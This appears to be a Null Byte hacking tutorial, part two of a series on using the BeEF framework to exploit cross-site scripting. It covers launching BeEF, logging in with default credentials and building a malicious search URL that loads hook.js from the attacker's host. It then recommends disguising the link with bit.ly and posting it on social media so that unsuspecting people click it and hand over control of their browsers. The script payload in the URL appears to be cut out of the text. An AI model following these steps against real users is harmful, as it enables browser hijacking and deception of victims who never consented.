Header Banner
Null Byte Logo
Null Byte
WonderHowTo Gadget Hacks Next Reality Null Byte
wonderhowto.mark.png
Cyber Weapons Lab Forum Metasploit Basics Facebook Hacks Password Cracking Top Wi-Fi Adapters Wi-Fi Hacking Linux Basics Mr. Robot Hacks Hack Like a Pro Forensics Recon Social Engineering Networking Basics Antivirus Evasion Spy Tactics MitM Advice from a Hacker
how to

Exploiting XSS with BeEF: Part 2

May 7, 2015 11:49 AM
Jun 23, 2015 04:39 PM
Bull logo for EEEF.

Now that we have our vulnerable server, it's time to start up BeEF.

Getting Started

Running BeEF

If you have Kali, BeEf comes pre-installed. You can find it in /usr/share/beef-xss/. Once you're there, type ./beef to execute the program.

635665686945944010.jpg

You will need to know both of these addresses. The top one is for the browser-grabbing JavaScript file, and the second one is for accessing the web UI.

Getting into the UI

Once you have run BeEF, you can access the web UI through your browser. Type http://your_ip:3000/ui/panel and you will be redirected to the login page.

635665689754223252.jpg

The default credentials are beef for both the username and password. After logging in, you will be presented with the start/help screen.

635665691349848051.jpg

Exploiting

Build the Malicious Code

Remember that line of text from the terminal earlier? That's the location of our malicious JS code. For me, it's http://10.0.2.13:3000/hook.js .

Since we want this to be run as code, we will implement this with the

Making the URL

Let's go back to when we searched for something. When we did, we had a part of the URL ...?query=lorem+ipsum. This is the part of the URL that tells the website what is being searched. By using XSS, we can take this even further to run pretty much whatever we want. When we build our url, it should look like http://victimsite.com/search.asp?query=

When the victim visits this website, it automatically "searches" for whatever is put behind the query=. But because we have a script, it will be run as a script instead of a search.

Sending to a Victim

In order to "hook" their browser, we need to send them this link. But of course, this might seem suspicious to the average user. But if we were to use a URL shortener like bit.ly, it would be hidden, and more people would click on it on social media.

Most websites that allow you to share articles/videos, etc. automatically include a bit.ly link in the message. If you were to share this bit.ly link on Twitter, no one will think of it being malicious.

http://bit.ly/1EjY8Tq

Doesn't that look much better than http://victimsite.com/search.asp?query=? I think so.

Done!

Once someone clicks on that innocent-looking link, you will have complete control over their browser! If you are attacking over WAN, don't forget to port forward.

Next Time...

In my next article, I will be explaining how to get a persistent connection with BeEF, including how to get a shell on the victim PC.

C|H of C3

The next big software update for iPhone is coming sometime in April and will include a Food section in Apple News+, an easy-to-miss new Ambient Music app, Priority Notifications thanks to Apple Intelligence, and updates to apps like Mail, Photos, Podcasts, and Safari. See what else is coming to your iPhone with the iOS 18.4 update.

Related Articles

Comments

No Comments Exist

Be the first, drop a comment!